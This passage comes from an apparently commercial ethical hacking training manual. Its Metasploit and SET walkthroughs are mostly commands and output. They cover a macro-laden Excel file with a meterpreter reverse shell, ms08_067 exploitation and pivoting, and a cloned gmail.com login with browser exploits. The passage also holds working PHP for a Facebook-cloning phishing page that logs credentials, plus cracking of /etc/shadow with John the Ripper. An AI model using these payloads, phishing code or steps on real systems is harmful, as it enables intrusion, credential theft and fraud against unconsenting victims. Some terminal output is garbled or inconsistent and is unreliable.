Shellcode: windows/meterpreter/reverse_tcp
Options: LHOST=192.168.3.103 LPORT=8080

Payload File: /var/lib/veil-evasion/output/source/excel_file.bat

Handler File: /var/lib/veil-evasion/output/handlers/excel_file_handler.rc
Open the bat file located at /var/lib/veil-evasion/output/source/excel_file.bat in a text editor.
Copy the following portion

TRANCHULAS | www.tranchulas.com 156

Hands-On Ethical Hacking and Penetration Testing Training Course

Create a new file named input.bat on desktop and paste the content in that file.

root@kali:~# cd Desktop/
root@kali:~/Desktop# gedit input.bat

Save the file. Now download the python script

https://www.dropbox.com/s/thwp7hgg3t6xsg3/macro_convert.py?dl=0 . Run it

root@kali:~/Desktop# python macro_convert.py input.bat output.txt

root@kali:~/Desktop# gedit output.txt

Copy all the content of output.txt

On your windows machine create a new excel file and save it in macro enabled format

TRANCHULAS | www.tranchulas.com 157

Hands-On Ethical Hacking and Penetration Testing Training Course

Save the file. Make sure the extension is .xlsm

Go to File -> Options

TRANCHULAS | www.tranchulas.com 158

Hands-On Ethical Hacking and Penetration Testing Training Course

Go to Customize Ribbon and check the Developer checkbox.

TRANCHULAS | www.tranchulas.com 159

Hands-On Ethical Hacking and Penetration Testing Training Course

Press Ok. Now under Developer go to Visual Basic or press Alt + F11

Right click on VBAProject and insert new module

Copy all the code from output.txt into the excel file

TRANCHULAS | www.tranchulas.com 160

Hands-On Ethical Hacking and Penetration Testing Training Course

Save and close the Visual Basic window

Save and close the excel file. On your Kali machine launch msfconsole. We need to create a
listener

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.3.103
LHOST => 192.168.3.103
msf exploit(handler) > set LPORT 8080

TRANCHULAS | www.tranchulas.com 161

Hands-On Ethical Hacking and Penetration Testing Training Course

LPORT => 8080

msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.3.103:8080

[*] Starting the payload handler...

Now we will send our malicious file to the target. As soon as the target opens the file and enables
the macro content we will get a reverse shell

[*] Sending stage (957999 bytes) to 192.168.3.102

[*] Meterpreter session 4 opened (192.168.3.103:8080 -> 192.168.3.102:59566) at 2016-11-
22 10:48:13 -0500

meterpreter > shell

Process 6880 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]

Pivoting
Pivoting is the unique technique of using an instance (also referred to as a ‘plant’ or ‘foothold’)
to be able to “move” around inside a network. Basically using the first compromise to allow and
even aid in the compromise of other otherwise inaccessible systems. In this scenario we will be
using it for routing traffic from a normally non-routable network.
Let us attack the machine at 192.168.2.20. We will use ms08_067_netapi.

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set RHOST 192.168.2.20
RHOST => 192.168.2.20
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > run

[*] Started bind handler

[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.2.20
[*] Meterpreter session 1 opened (192.168.0.6:4444 -> 192.168.2.20:1030) at 2015-11-05
04:41:27 -0500
meterpreter >

TRANCHULAS | www.tranchulas.com 162

Hands-On Ethical Hacking and Penetration Testing Training Course

As we can see that the exploit has successfully executed and we now have a meterpreter shell.
When we run the ipconfig command we see that the target is connected to multiple networks.

eterpreter > ifconfig

Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1

Interface 65539
============
Name : AMD PCNET Family PCI Ethernet Adapter #2 - Packet Scheduler Miniport
Hardware MAC : 00:0c:29:92:35:52
MTU : 1500
IPv4 Address : 192.168.2.20
IPv4 Netmask : 255.255.0.0

Interface 65540
============
Name : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 00:0c:29:92:35:5c
MTU : 1500
IPv4 Address : 192.170.1.3
IPv4 Netmask : 255.255.255.0

The second IP address 192.170.1.3 is another network that the target is connected to. We want
to leverage this newly discovered information and attack this additional network. Metasploit has
an autoroute meterpreter script that will allow us to attack this second network through our first
compromised machine.
We are interested in 192.170.1.0/24

meterpreter > run autoroute -s 192.170.1.0/24

[*] Adding a route to 192.170.1.0/255.255.255.0...
[+] Added route to 192.170.1.0/255.255.255.0 via 192.168.2.20
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

Active Routing Table

TRANCHULAS | www.tranchulas.com 163

Hands-On Ethical Hacking and Penetration Testing Training Course

====================

Subnet Netmask Gateway

------ ------- -------
192.170.1.0 255.255.255.0 Session 5

-p gives a list of all active routes

Now that we have added our additional route, we will escalate to SYSTEM, and background our
meterpreter session by pressing Ctrl-z or by background command.

Now we need to determine if there are other systems on this second network we have
discovered. We will use a basic TCP port scanner to look for ports 139 and 445.

msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set RHOSTS 192.170.1.0/24
RhOSTS => 192.170.1.0/24
msf auxiliary(tcp) > set PORTS 80,139,445
PORTS => 80,139,445
msf auxiliary(tcp) > set THREADS 100
THREADS => 100
msf auxiliary(tcp) > run

It will take some time to scan the whole network. You can increase the number of THREADS to
speed up the process. You will get the following result

[*] 192.170.1.1: - 192.170.1.1:80 - TCP OPEN

[*] 192.170.1.5: - 192.170.1.5:445 - TCP OPEN
[*] 192.170.1.5: - 192.170.1.5:139 - TCP OPEN
[*] 192.170.1.3: - 192.170.1.3:139 - TCP OPEN
[*] 192.170.1.3: - 192.170.1.3:445 - TCP OPEN

As we can see that there is another machine active on the network 192.170.1.5. So, we will try
ms08 on it as well.

msf > use exploit/windows/smb/ms08_067_netapi

TRANCHULAS | www.tranchulas.com 164

Hands-On Ethical Hacking and Penetration Testing Training Course

msf exploit(ms08_067_netapi) > set RHOST 192.170.1.5

RHOST => 192.168.3.116
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > run

[*] Started bind handler

[*] 192.170.1.5:445 - Automatically detecting the target...
[*] 192.170.1.5:445 - Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] 192.170.1.5:445 - Selected Target: Windows XP SP0/SP1 Universal
[*] 192.170.1.5:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.170.1.5
[*] Meterpreter session 3 opened (192.167.0.6-192.168.2.20:0 -> 192.170.1.5:4434) at 2016-
11-08 08:30:10 -0500

meterpreter>

We run ipconfig command

meterpreter > ifconfig

Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1

Interface 65539
============
Name : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 00:0c:29:c1:1e:28
MTU : 1500
IPv4 Address : 192.170.1.5
IPv4 Netmask : 255.255.255.0

As you can see, pivoting is an extremely powerful feature and is a critical capability to have on
penetration tests.

TRANCHULAS | www.tranchulas.com 165

Hands-On Ethical Hacking and Penetration Testing Training Course

Cisco Exploits
Cisco Global Exploiter (CGE)
CGE is a simple exploit engine driven by perl for testing vulnerabilities in Cisco switches and
routers. CGE can exploit the following 14 vulnerabilities:
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability[5] - Cisco
Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability
Lauch Cisco Global Exploiter

root@kali:# cd /usr/bin
root@kali:/usr/bin# perl cge.pl

Usage :
perl cge.pl <target> <vulnerability number>

Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability

TRANCHULAS | www.tranchulas.com 166

Hands-On Ethical Hacking and Penetration Testing Training Course

[6] - Cisco 675 Web Administration Denial of Service Vulnerability

[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability

The syntax to use it is:

perl cge.pl <target> <vulnerability_number>

Cisco Exploitation through Metasploit

Metasploit also has few Cisco exploits. You can browse through them in msfconsole.

msf > search cisco

Phishing
Phishing is a way of attempting to acquire information such as usernames, passwords, and
credit card details by masquerading as a trustworthy entity in an electronic communication.
Communications purporting to be from popular social web sites, auction sites, online payment
processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is
typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter
details at a fake website whose look and feel are almost identical to the legitimate one. Phishing
is an example of social engineering techniques used to deceive users, and exploits the poor
usability of current web security technologies. Attempts to deal with the growing number of
reported phishing incidents include legislation, user training, public awareness, and technical
security measures.
Creating a Phishing Page:
Let’s consider facebook.com as an example here.
1. View source of facebook.com and copy all the text to notepad.
2. Search for “action” in code.
3. Delete the link given against action and replace it with login.php
4. Change method=post to method=get.

TRANCHULAS | www.tranchulas.com 167

Hands-On Ethical Hacking and Penetration Testing Training Course

5. Save the file as index.html.

6. Create a new file in notepad with following code:

<?php
header(”Location: http://www.Facebook.com/login.php “);
$handle = fopen(”passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);

fwrite($handle, “\r\n”);

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

7. Save it as login.php.
8. Create another file and save it as passwords.txt.
9. Upload these files to your webserver.
10. Your phishing page is ready and can be accessed through your web server.
11. All usernames and passwords will be saved in passwords.txt

John the Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are
officially supported, not counting different architectures), Windows, DOS, BeOS, and
OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3)
password hash types most commonly found on various Unix flavors, supported out of the box
are Kerberos/AFS and Windows LM hashes, as well as DES-based tripcodes, plus many more
hashes and ciphers in "community enhanced" -jumbo versions and/or with other contributed
patches. [9]

TRANCHULAS | www.tranchulas.com 168

Hands-On Ethical Hacking and Penetration Testing Training Course

root@kali:~# john
Created directory: /root/.john
John the Ripper password cracker, version 1.8.0.6-jumbo-1-bleeding [linux-x86-sse2]
Copyright (c) 1996-2015 by Solar Designer and others
Homepage: http://www.openwall.com/john/

Usage: john [OPTIONS] [PASSWORD-FILES]

--single[=SECTION] "single crack" mode
--wordlist[=FILE] --stdin wordlist mode, read words from FILE or stdin
--pipe like --stdin, but bulk reads, and allows rules
--loopback[=FILE] like --wordlist, but fetch words from a .pot file
--dupe-suppression suppress all dupes in wordlist (and force preload)
--prince[=FILE] PRINCE mode, read words from FILE
--encoding=NAME input encoding (eg. UTF-8, ISO-8859-1). See also
doc/ENCODING and --list=hidden-options.
--rules[=SECTION] enable word mangling rules for wordlist modes
--incremental[=MODE] "incremental" mode [using section MODE]
--mask=MASK mask mode using MASK
--markov[=OPTIONS] "Markov" mode (see doc/MARKOV)
--external=MODE external mode or word filter
--stdout[=LENGTH] just output candidate passwords [cut at LENGTH]
--restore[=NAME] restore an interrupted session [called NAME]
--session=NAME give a new session the NAME
--status[=NAME] print status of a session [called NAME]
--make-charset=FILE make a charset file. It will be overwritten
--show[=LEFT] show cracked passwords [if =LEFT, then uncracked]
--test[=TIME] run tests and benchmarks for TIME seconds each
--users=[-]LOGIN|UID[,..] [do not] load this (these) user(s) only
--groups=[-]GID[,..] load users [not] of this (these) group(s) only
--shells=[-]SHELL[,..] load users with[out] this (these) shell(s) only
--salts=[-]COUNT[:MAX] load salts with[out] COUNT [to MAX] hashes
--save-memory=LEVEL enable memory saving, at LEVEL 1..3
--node=MIN[-MAX]/TOTAL this node's number range out of TOTAL count
--fork=N fork N processes
--pot=NAME pot file to use
--list=WHAT list capabilities, see --list=help or doc/OPTIONS
--format=NAME force hash of type NAME. The supported formats can
be seen with --list=formats and --list=subformats

1. Open terminal
2. Type the following command:

root@root:~# unshadow /etc/passwd /etc/shadow > crack

TRANCHULAS | www.tranchulas.com 169

Hands-On Ethical Hacking and Penetration Testing Training Course

3. The unshadow command will basically combine the data of /etc/passwd and
/etc/shadow to create 1 file with username and password details of all users of
your Linux machine.
4. Now you can use this newly created file to crack the passwords of your Linux machine

root@root:~# john crack

5. You can also type the following command:

john --wordlist=/usr/share/john/password.lst crack

6. To see the cracked passwords

john –show crack

7. In the above screenshot, one can see that the JTR has cracked two passwords with
following credentials:
a. Username: test password: password
b. Username: new password: password
8. JTR was not able to crack the root password since it was not in the wordlist provided.
9. Alternatively you can download or create your own wordlists for password cracking.
10. To do a bruteforce attack one can use following commands:

TRANCHULAS | www.tranchulas.com 170

Hands-On Ethical Hacking and Penetration Testing Training Course

Module 9: More Exploitation

TRANCHULAS | www.tranchulas.com 171

Hands-On Ethical Hacking and Penetration Testing Training Course

Social Engineering Toolkit

Type setoolkit in terminal. Select Social Engineering Attacks

Select from the menu:

1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

Spear Phishing Attacks

The spear-phishing attack is used for targeted email attacks against a victim. You can send
multiple emails based on results from email harvester or you can send it to individuals. You can
also utilize file format (for example a PDF bug) and send the malicious attack to the victim.

set> 1

The Spearphishing module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure "Sendmail" is in-
stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1) Perform a Mass Email Attack

2) Create a FileFormat Payload
3) Create a Social-Engineering Template

99) Return to Main Menu

TRANCHULAS | www.tranchulas.com 172

Hands-On Ethical Hacking and Penetration Testing Training Course

Website Attack Vector

The web attack vector is used to conduct phishing attacks.

set> 2

The Web Attack module is a unique way of utilizing multiple web-based attacks in order to
compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based
payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit browser exploits
through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web- site that has a username
and password field and harvest all the information posted to the website.

The TabNabbing method will wait for a user to move to a different tab, then refresh the page
to something different.

The Web-Jacking Attack method was introduced by white_sheep, emgent. This method
utilizes iframe replacements to make the highlighted URL link to appear legitimate however
when clicked a window pops up then is replaced with the malicious link. You can edit the link
replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack menu. For
example you can utilize the Java Applet, Metasploit Browser, Credential
Harvester/Tabnabbing all at once to see which is successful.

The HTA Attack method will allow you to clone a site and perform powershell injection
through HTA files which can be used for Windows-based powershell exploitation through the
browser.

1) Java Applet Attack Method

2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method

99) Return to Main Menu

TRANCHULAS | www.tranchulas.com 173
Hands-On Ethical Hacking and Penetration Testing Training Course

Java Applet Attack Method

The Java Applet attack will create a malicious Java Applet that once run will completely
compromise the victim. SET clones a website and once the victim has clicked run, it will
redirect the victim back to the original site. This attack vector affects Windows, Linux, and OSX
and can compromise them all. You can select web templates which are pre-defined websites, or
you can import your own website. In this example we will be using the site cloner which will clone
a website for us. Let’s launch SET and prep our attack.

set:webattack>1

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing

and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

The first method will allow SET to import a list of pre-defined web applications that it can utilize
within the attack. The second method will completely clone a website of your choosing and allow
you to utilize the attack vectors within the completely same web application you were
attempting to clone. The third method allows you to import your own website, note that you
should only have an index.html when using the import website functionality.
As soon as victim clicks on run on your java applet popup, you will get a reverse connection.

Metasploit Browser Exploit Method

TRANCHULAS | www.tranchulas.com 174

Hands-On Ethical Hacking and Penetration Testing Training Course

The Metasploit Browser Exploit Method will import Metasploit client-side exploits with the ability
to clone the website and utilize browser-based exploits. Let’s take a quick look on exploiting a
browser exploit through SET.

set:webattack>2

The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing

and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

The first method will allow SET to import a list of pre-defined web applications that it can utilize
within the attack. The second method will completely clone a website of your choosing and allow
you to utilize the attack vectors within the completely same web application you were
attempting to clone. The third method allows you to import your own website, note that
you should only have an index.html when using the import website functionality.
We will use Site Cloner

set:webattack>2
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address or hostname for the reverse connection:192.168.3.103
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://gmail.com

Enter the browser exploit you would like to use [8]:

TRANCHULAS | www.tranchulas.com 175

Hands-On Ethical Hacking and Penetration Testing Training Course

1) Adobe Flash Player ByteArray Use After Free (2015-07-06)

2) Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
3) Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
4) MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)
5) MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)
6) Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)
7) Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)
We now have a list of exploits that we can use. We will select 1. You can select any one of them.
After that select a payload

set:payloads>1

1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to
attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send
back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to
attacker
4) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64),
Meterpreter

set:payloads>1
set:payloads> Port to use for the reverse [443]:443

[*] Processing /root/.set//meta_config for ERB directives.

resource (/root/.set//meta_config)> use
exploit/multi/browser/adobe_flash_hacking_team_uaf
resource (/root/.set//meta_config)> set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
resource (/root/.set//meta_config)> set LHOST 192.168.3.103
LHOST => 192.168.3.103
resource (/root/.set//meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set//meta_config)> set URIPATH /
URIPATH => /
resource (/root/.set//meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (/root/.set//meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set//meta_config)> exploit -j
[*] Exploit running as background job.

TRANCHULAS | www.tranchulas.com 176

Hands-On Ethical Hacking and Penetration Testing Training Course

[*] Started reverse TCP handler on 192.168.3.103:443

msf exploit(adobe_flash_hacking_team_uaf) > [*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.3.103:8080/

Now when the target will browse to http://192.168.3.103:8080. You will get the reverse shell if
the target is exploitable.
We will be able to see the requests.

Credential Harvester Attack Method

The credential harvester attack method is used when you don’t want to specifically get a shell
but perform phishing attacks in order to obtain username and passwords from the system.
Tabnabbing Attack Method
The tabnabbing attack method is used when a victim has multiple tabs open, when the user clicks
the link, the victim will be presented with a “Please wait while the page loads”. When the victim
switches tabs because he/she is multi-tasking, the website detects that a different tab is present
and rewrites the webpage to a website you specify. The victim clicks back on the tab after a
period of time and thinks they were signed out of their email program or their business
application and types the credentials in. When the credentials are inserted, they are harvested
and the user is redirected back to the original website.
Web Jacking Attack Method

The web jacking attack method will create a website clone and present the victim with a link
stating that the website has moved. When you hover over the link, the URL will be presented
with the real URL, not the attacker’s machine. So for example if you are cloning gmail.com, the
url when hovered over it would be gmail.com. When the user clicks the moved link, gmail
opens and then is quickly replaced with your malicious webserver.
Multi Attack Web Vector
The multi-attack web vector will allow you to specify multiple web attack methods in order to
perform a single attack. In some scenarios, the Java Applet may fail however an internet
explorer exploit would be successful. Or maybe the Java Applet and the Internet Explorer
exploit fail and the credential harvester is successful. The multi-attack vector allows you to turn
on and off different vectors and combine the attacks all into one specific webpage. So when the
user clicks the link he will be targeted by each of the attack vectors you specify.
Infectious Media Generator

TRANCHULAS | www.tranchulas.com 177

Hands-On Ethical Hacking and Penetration Testing Training Course

Infectious Media Generator creates a Metasploit-based payload, setup a listener for you and
generate a folder that needs to be burned or written to a DVD/USB drive. Once inserted, if
AutoRun is enabled, the code will automatically execute and take control of the machine.

Browser autopwn
Browser Autopwn performs browser fingerprinting prior to launching exploits at the victim.
Therefore, if the remote PC is using Internet Explorer 6, it will not launch IE7 exploits at it.

msf > use auxiliary/server/browser_autopwn

msf auxiliary(browser_autopwn) > set LHOST 192.168.3.103
LHOST => 192.168.3.103
msf auxiliary(browser_autopwn) > set SRVHOST 192.168.3.103
SRVHOST => 192.168.3.103
msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed

[*] Setup
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host 192.168.3.103...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload

android/meterpreter/reverse_tcp
[*] Using URL: http://192.168.3.103:8080/wmZv
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload
generic/shell_reverse_tcp
[*] Using URL: http://192.168.3.103:8080/ZXUnDgsDrzMA

It will start multiple listeners for multiple exploits. When the target browses
http://192.168.3.103:8080, we will get the request.

[*] --- Done, found 20 exploit modules

[*] Using URL: http://192.168.3.103:8080/

[*] Server started.
[*] Handling '/'

TRANCHULAS | www.tranchulas.com 178

Hands-On Ethical Hacking and Penetration Testing Training Course

[*] Handling
'/?sessid=V2luZG93czp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZW
Q6ZW4tVVM6eDg2OkNocm9tZTo1NC4wLjI4NDAuOTk6'
[*] JavaScript Report: Windows:undefined:undefined:undefined:undefined:en-
US:x86:Chrome:54.0.2840.99:
[*] Reporting: {"os.product"=>"Windows", "os.language"=>"en-US", "os.arch"=>"x86",
"os.certainty"=>"0.7"}
[*] Responding with 6 exploits
[*] Handling '/'
[*] Handling
'/?sessid=V2luZG93czp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZW
Q6ZW4tVVM6eDg2OkNocm9tZTo1NC4wLjI4NDAuOTk6'
[*] JavaScript Report: Windows:undefined:undefined:undefined:undefined:en-
US:x86:Chrome:54.0.2840.99:
[*] Reporting: {"os.product"=>"Windows", "os.language"=>"en-US", "os.arch"=>"x86",
"os.certainty"=>"0.7"}
[*] Responding with 6 exploits

As soon as victim visits our URL we’ll get a session if browser is vulnerable.

TRANCHULAS | www.tranchulas.com 179

Hands-On Ethical Hacking and Penetration Testing Training Course

Module 10: Web Application

Hacking

TRANCHULAS | www.tranchulas.com 180

Hands-On Ethical Hacking and Penetration Testing Training Course

Information Gathering

Directory Fuzzing/URL Mapping:

Dirbuster is a tool for directory brute force. It uses wordlists to guess directory names. Use the
following command in terminal

root@kali:~# dirbuster

1. Enter Target URL: http://192.168.2.5 or http://targetwebsite.com

2. Click Browse select a Wordlist
3. Click Start

TRANCHULAS | www.tranchulas.com 181

Hands-On Ethical Hacking and Penetration Testing Training Course

Lists are located in /usr/share/wordlists/dirbuster

4. After sometime scan will be complete

TRANCHULAS | www.tranchulas.com 182

Hands-On Ethical Hacking and Penetration Testing Training Course

Introduction to Burp Suite

Burp Suite is a very powerful tool used for web application security penetration testing. It has a
wide range of features that allows us to perform various tasks, launch various attacks etc. It works
as a proxy and intercepts web traffic. It also works on SSL.

You can download burp suite from https://portswigger.net/burp/download.html. Start burp

suite. You will be presented with an interface.

TRANCHULAS | www.tranchulas.com 183

Hands-On Ethical Hacking and Penetration Testing Training Course

First, we need to configure burp suite to work as a proxy. Go to Proxy -> Options. Check the
127.0.0.1:8080 interface.

Now go to Intercept Server Responses and check Intercept Responses based on following rules

TRANCHULAS | www.tranchulas.com 184

Hands-On Ethical Hacking and Penetration Testing Training Course

Burp Suite is now ready to intercept traffic. Now open Firefox or any other browser. Go to
Options -> Advanced -> Network -> Settings

Now add 127.0.0.1 and port 8080. Remove localhost, 127.0.0.1 from No proxy for.

TRANCHULAS | www.tranchulas.com 185

Hands-On Ethical Hacking and Penetration Testing Training Course

All the browsing performed in Firefox will be captured by Burp Suite.

TRANCHULAS | www.tranchulas.com 186

Hands-On Ethical Hacking and Penetration Testing Training Course

Now we will start information gathering phase using burp suite. Browse to any website or web
application. We have opened http://192.168.3.100/twa/index.php

Now go to the Target tab and right click on the address and add to scope.

TRANCHULAS | www.tranchulas.com 187

Hands-On Ethical Hacking and Penetration Testing Training Course

If you go to the scope tab you will see that it is added to scope. Now we want to get information
about the application like the directory structure. We will use the Spider tool which spiders the
host to find links and map a structure of the application.

Spider has started

TRANCHULAS | www.tranchulas.com 188

Hands-On Ethical Hacking and Penetration Testing Training Course

We will see the directory structure and pages of application

Fingerprinting using Wapplyzer

Wapplyzer is a browser extension which can be used to identify critical information about the
web application and the underlying server. It is a free extension that can be installed on firefox
or chrome.
For chrome
https://chrome.google.com/webstore/detail/wappalyzer/gppongmhjkpfnbhagpmjfkannfbllamg
?hl=en
For Firefox
https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
As soon as we browse to a website. It gives the complete information about the technologies.

TRANCHULAS | www.tranchulas.com 189

Hands-On Ethical Hacking and Penetration Testing Training Course

This is critical information as we can now look for technology specific vulnerabilities as well.

SQL Injection
SQL Injection is a common web vulnerability found in dynamic sites that is caused by unsanitized
user input, which is then passed on to a database. This user input can then be manipulated to
“break out” of the original query made by the developers, to include more malicious actions.
These types of vulnerabilities can lead to database information leakage and, depending on the
environment, could also lead to complete server compromise. Before we move on to SQL
injection lets go through some concepts
Database:
A database is a repository, collection of data needed by the web application. It may include
usernames, passwords, IDs and related information. There are various database servers being
used. Some of these are:
- MySQL
- MSSQL
- MS-Access
- Oracle
- PostgreSQL
- SQLite
SQL

TRANCHULAS | www.tranchulas.com 190

Hands-On Ethical Hacking and Penetration Testing Training Course

Structured Query Language (SQL) is a programming language for getting data in and out of a
database. Various commands are used for managing a database.
A sample SQL query is as follows:

Select * from table_name;

For example
Select * from users;
The query outputs all the data from the users table. These include all the rows inside the users
table.

Another query is

Insert into table_name (column names..) values (x,y,z…..)

For example
Insert into users (ID, name, dob) values (4, Jacob, 14-2-1990)

Injection Points

There are certain input points where we should look for SQL injection. For example login pages,
search pages etc. SQL injection can be done using both GET and POST methods. To check for SQL
injection ‘ or a special character is entered as input. Following is an example of an SQL injection
using GET method

We inject a ‘ at parameter id

As you can see we got a database error. Which shows that input is being fed straight to SQL query
without sanitization.

TRANCHULAS | www.tranchulas.com 191

Hands-On Ethical Hacking and Penetration Testing Training Course

An example of POST SQL injection is a login form

Putting a comma ‘ in username field and pressing login, we get the following error

The error messages show that SQL injection is possible. Now that we have identified SQL injection
we can launch further attacks.

TRANCHULAS | www.tranchulas.com 192

Hands-On Ethical Hacking and Penetration Testing Training Course

Authentication Bypass

SQL injection is a code injection technique, used to attack data-driven applications, in which
malicious SQL statements are inserted into an entry field for execution.
